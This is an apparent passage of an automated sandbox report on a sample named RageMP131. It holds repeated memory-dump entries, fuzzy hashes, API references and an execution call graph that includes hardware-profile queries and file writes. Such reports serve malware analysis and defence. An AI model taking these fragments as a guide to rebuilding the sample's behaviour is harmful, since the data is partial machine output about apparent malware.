                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: at line $, column
                                      • API String ID: 4194217158-191570568
                                      • Opcode ID: 3abd2d2db09439d41dfa4d24e2551be5fce5a0e639af3d2d13fac6acfa9eed87
                                      • Instruction ID: c64b09841dabcf670b657a8fb7792b1431763f6087eccbf2f57a40131b36d04f
                                      • Opcode Fuzzy Hash: 3abd2d2db09439d41dfa4d24e2551be5fce5a0e639af3d2d13fac6acfa9eed87
                                      • Instruction Fuzzy Hash: BB612A71D002049FDB08DFA8DC85BADBFB6FF55310F14861CE415A7782EBB4AA848B95
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C3C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1866435925
                                      • Opcode ID: e7aa58ccd639f3b69575b4ff2b2e8298f6b6753b5afca5eaefd30c7e45ebe9bd
                                      • Instruction ID: e8e903cddf8186aec111858d7a7d358ad1ec778b584b44c964f13b0e482ae77d
                                      • Opcode Fuzzy Hash: e7aa58ccd639f3b69575b4ff2b2e8298f6b6753b5afca5eaefd30c7e45ebe9bd
                                      • Instruction Fuzzy Hash: 4011D1B29007086FC710DF98D806F9ABBADAB05310F04852EFA5897641FB70A904CB91
                                      Strings
                                      • unordered_map/set too long, xrefs: 006321D3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: unordered_map/set too long
                                      • API String ID: 0-306623848
                                      • Opcode ID: 53c603eceb749b7c565c211117a2a1a9a2a405b5bc9ada22e866407674cd9958
                                      • Instruction ID: 95e91ff012c5345b21686b1f9fa9293adedc9e5cc57e7d2f3423838f9a687f74
                                      • Opcode Fuzzy Hash: 53c603eceb749b7c565c211117a2a1a9a2a405b5bc9ada22e866407674cd9958
                                      • Instruction Fuzzy Hash: A5E1B071A006069FCB18DF68C991AA9B7F6FF49310F14826DE8199B391E730ED55CBD0
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C844D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: parse error$ror
                                      • API String ID: 2659868963-4201802366
                                      • Opcode ID: a0098d55dd1c083c1c2f729ad8c7438881c24250b2c32c1ac14e3f38714bdc69
                                      • Instruction ID: 853fd2fd5c5519cad413f7c0fc1f0d17086b4acb7703937a64e8715e1cee8822
                                      • Opcode Fuzzy Hash: a0098d55dd1c083c1c2f729ad8c7438881c24250b2c32c1ac14e3f38714bdc69
                                      • Instruction Fuzzy Hash: 1EC10471D006498FDB08CFA8CC85BADBBB6FF55304F14825CE405AB792DB74AA84CB91
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C8A93
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C8C71
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ange
                                      • API String ID: 2659868963-4159947239
                                      • Opcode ID: c97f711525860b6c149d4e664d6dfab6ed1e04df121322745797c397ce94cf6a
                                      • Instruction ID: 0c6b5584b240c17f2822e1b3ad8adc163248b61b1ba50006c93a1b53cf9148c3
                                      • Opcode Fuzzy Hash: c97f711525860b6c149d4e664d6dfab6ed1e04df121322745797c397ce94cf6a
                                      • Instruction Fuzzy Hash: 1AB1F271C002488FDB08CFA8CC84BADFBB5FF59314F14871DE4156B692EBB4A9848B55
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C8051
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C8060
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: [json.exception.
                                      • API String ID: 4194217158-791563284
                                      • Opcode ID: 8129629462bd598b26ff5f41f0916f311fade4723931467bcb99b4b4f3c7dda8
                                      • Instruction ID: 739ac8b6f9e0a082b8453ba1c7ec58e03e0489634cb541a9d70c331ff0b448d4
                                      • Opcode Fuzzy Hash: 8129629462bd598b26ff5f41f0916f311fade4723931467bcb99b4b4f3c7dda8
                                      • Instruction Fuzzy Hash: 6191FB719002089FDB18CFA8CC85FAEBFB6FF55310F14825DE411AB692D7749A84CB95
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C3C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1240500531
                                      • Opcode ID: 5254c821322bde3c842bb2106ec825458c8925b9d569efacf8b48082ed2e1729
                                      • Instruction ID: da3b1ba33f1753143414024fba99a0588d353f96338eb558944ca793f97c8aae
                                      • Opcode Fuzzy Hash: 5254c821322bde3c842bb2106ec825458c8925b9d569efacf8b48082ed2e1729
                                      • Instruction Fuzzy Hash: 0541D3B5900608AFCB04DF98CC45FAABBB9FF45310F14822EF91497681E774AA40CBA5
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006340B9
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006340D2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00634BDD
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00634BF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: value
                                      • API String ID: 4194217158-494360628
                                      • Opcode ID: a438e1bbe23aab0210299f31f41dd09c181986313d9492769b458beb0a95371d
                                      • Instruction ID: f7314916dd665d094b646be539a6baeb3f1de86f4bb2489a4800a81684d31477
                                      • Opcode Fuzzy Hash: a438e1bbe23aab0210299f31f41dd09c181986313d9492769b458beb0a95371d
                                      • Instruction Fuzzy Hash: 0051A1B0C00258DBDF14DFA4CC89BDEFBB6AF05304F14425DE445A7382DB746A888B95
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00638D11
                                      Strings
                                      • type must be boolean, but is , xrefs: 00638E02
                                      • type must be string, but is , xrefs: 00638D78
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID: type must be boolean, but is $type must be string, but is
                                      • API String ID: 118556049-436076039
                                      • Opcode ID: 961aae2fde3eddf42346dcc0b0977d26401771992a11de07f0bd65e574c78bd0
                                      • Instruction ID: 249041ac510b7200d517c3c378caea50c10c8fc366fc07cbf57b6fd2f4ef2e44
                                      • Opcode Fuzzy Hash: 961aae2fde3eddf42346dcc0b0977d26401771992a11de07f0bd65e574c78bd0
                                      • Instruction Fuzzy Hash: 223127B5900288AFDB14EBA4D846FEDB7AAEF11700F10056CF41597782EF34AA44CB96

                                      Execution Graph

                                      Execution Coverage:1.7%
                                      Dynamic/Decrypted Code Coverage:2%
                                      Signature Coverage:0%
                                      Total number of Nodes:252
                                      Total number of Limit Nodes:41
                                      execution_graph 22338 5140595 22339 51405a1 GetCurrentHwProfileW 22338->22339 22340 514059c 22338->22340 22341 51405c3 22339->22341 22340->22339 22683 63bd30 RtlAllocateHeap 22680 5c2540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::locale::_Locimp::_Locimp 22681 5d4540 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 22691 5d9bc0 7 API calls 3 library calls 22348 51403f5 GetCurrentHwProfileW 22349 6a9e88 22350 6a9e9b ___std_exception_copy 22349->22350 22355 6a9c6a 22350->22355 22352 6a9eb0 22363 6a11fc RtlAllocateHeap ___std_exception_copy 22352->22363 22354 6a9ebd 22356 6a9c78 22355->22356 22357 6a9ca0 22355->22357 22356->22357 22358 6a9ca7 22356->22358 22359 6a9c85 22356->22359 22357->22352 22364 6a9bc3 22358->22364 22368 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22359->22368 22362 6a9cdf 22362->22352 22363->22354 22365 6a9bcf std::locale::_Setgloballocale 22364->22365 22369 6a9c1e 22365->22369 22367 6a9bea 22367->22362 22368->22357 22376 6b5363 22369->22376 22375 6a9c60 22375->22367 22393 6b5325 22376->22393 22378 6a9c36 22383 6a9ce1 22378->22383 22379 6b5374 22379->22378 22400 6b3b4d RtlAllocateHeap RtlAllocateHeap __dosmaperr __Getctype std::_Facet_Register 22379->22400 22381 6b53cd 22401 6b3ad3 RtlAllocateHeap __dosmaperr 22381->22401 22384 6a9c54 22383->22384 22386 6a9cf3 22383->22386 22392 6b540e SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap 22384->22392 22385 6a9d01 22423 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22385->22423 22386->22384 22386->22385 22388 6a9d37 std::locale::_Locimp::_Locimp 22386->22388 22388->22384 22390 6b2ca2 RtlAllocateHeap 22388->22390 22424 6a22f1 22388->22424 22430 6b20ab 22388->22430 22390->22388 22392->22375 22394 6b5331 22393->22394 22395 6b535b 22394->22395 22402 6b2ca2 22394->22402 22395->22379 22397 6b534c 22409 6bda74 22397->22409 22399 6b5352 22399->22379 22400->22381 22401->22378 22403 6b2cae 22402->22403 22404 6b2cc3 22402->22404 22418 6a9f5f RtlAllocateHeap __dosmaperr 22403->22418 22404->22397 22406 6b2cb3 22419 6a14c0 RtlAllocateHeap ___std_exception_copy 22406->22419 22408 6b2cbe 22408->22397 22410 6bda8e 22409->22410 22411 6bda81 22409->22411 22415 6bda9a 22410->22415 22421 6a9f5f RtlAllocateHeap __dosmaperr 22410->22421 22420 6a9f5f RtlAllocateHeap __dosmaperr 22411->22420 22414 6bda86 22414->22399 22415->22399 22416 6bdabb 22422 6a14c0 RtlAllocateHeap ___std_exception_copy 22416->22422 22418->22406 22419->22408 22420->22414 22421->22416 22422->22414 22423->22384 22425 6a230a 22424->22425 22426 6a2331 22424->22426 22425->22426 22427 6b2ca2 RtlAllocateHeap 22425->22427 22426->22388 22428 6a2326 22427->22428 22429 6b20ab 4 API calls 22428->22429 22429->22426 22432 6b20b7 std::locale::_Setgloballocale 22430->22432 22431 6b20f8 22451 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22431->22451 22432->22431 22434 6b213e 22432->22434 22436 6b20bf 22432->22436 22434->22436 22437 6b21bc 22434->22437 22436->22388 22438 6b21e4 22437->22438 22450 6b2207 22437->22450 22439 6b21e8 22438->22439 22441 6b2243 22438->22441 22457 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22439->22457 22442 6b2261 22441->22442 22458 6aae9d 22441->22458 22452 6b1d01 22442->22452 22446 6b2279 22446->22450 22461 6b18d2 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor _ValidateLocalCookies std::locale::_Locimp::_Locimp 22446->22461 22447 6b22c0 22448 6b2329 WriteFile 22447->22448 22447->22450 22448->22450 22450->22436 22451->22436 22453 6bda74 RtlAllocateHeap 22452->22453 22455 6b1d13 22453->22455 22454 6b1d41 22454->22446 22454->22447 22455->22454 22462 6a6a30 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor ___std_exception_copy 22455->22462 22457->22450 22463 6aad7c 22458->22463 22460 6aaeb6 22460->22442 22461->22450 22462->22454 22468 6b7400 22463->22468 22465 6aad8e 22466 6aadaa SetFilePointerEx 22465->22466 22467 6aad96 22465->22467 22466->22467 22467->22460 22469 6b740d 22468->22469 22470 6b7422 22468->22470 22481 6a9f4c RtlAllocateHeap __dosmaperr 22469->22481 22476 6b7447 22470->22476 22483 6a9f4c RtlAllocateHeap __dosmaperr 22470->22483 22472 6b7412 22482 6a9f5f RtlAllocateHeap __dosmaperr 22472->22482 22474 6b7452 22484 6a9f5f RtlAllocateHeap __dosmaperr 22474->22484 22476->22465 22478 6b741a 22478->22465 22479 6b745a 22485 6a14c0 RtlAllocateHeap ___std_exception_copy 22479->22485 22481->22472 22482->22478 22483->22474 22484->22479 22485->22478 22486 6a5908 22487 6a591b ___std_exception_copy 22486->22487 22492 6a57e3 22487->22492 22489 6a5927 22499 6a11fc RtlAllocateHeap ___std_exception_copy 22489->22499 22491 6a5933 22493 6a57ef std::locale::_Setgloballocale 22492->22493 22494 6a57f9 22493->22494 22497 6a581c 22493->22497 22514 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22494->22514 22496 6a5814 22496->22489 22497->22496 22500 6a587a 22497->22500 22499->22491 22501 6a5887 22500->22501 22503 6a58aa 22500->22503 22526 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22501->22526 22504 6a58a2 22503->22504 22505 6a22f1 4 API calls 22503->22505 22504->22496 22506 6a58c2 22505->22506 22515 6b3b0d 22506->22515 22509 6b2ca2 RtlAllocateHeap 22510 6a58d6 22509->22510 22519 6b175f 22510->22519 22514->22496 22516 6a58ca 22515->22516 22517 6b3b24 22515->22517 22516->22509 22517->22516 22528 6b3ad3 RtlAllocateHeap __dosmaperr 22517->22528 22520 6b1788 22519->22520 22525 6a58dd 22519->22525 22521 6b17d7 22520->22521 22523 6b17af 22520->22523 22533 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22521->22533 22529 6b16ce 22523->22529 22525->22504 22527 6b3ad3 RtlAllocateHeap __dosmaperr 22525->22527 22526->22504 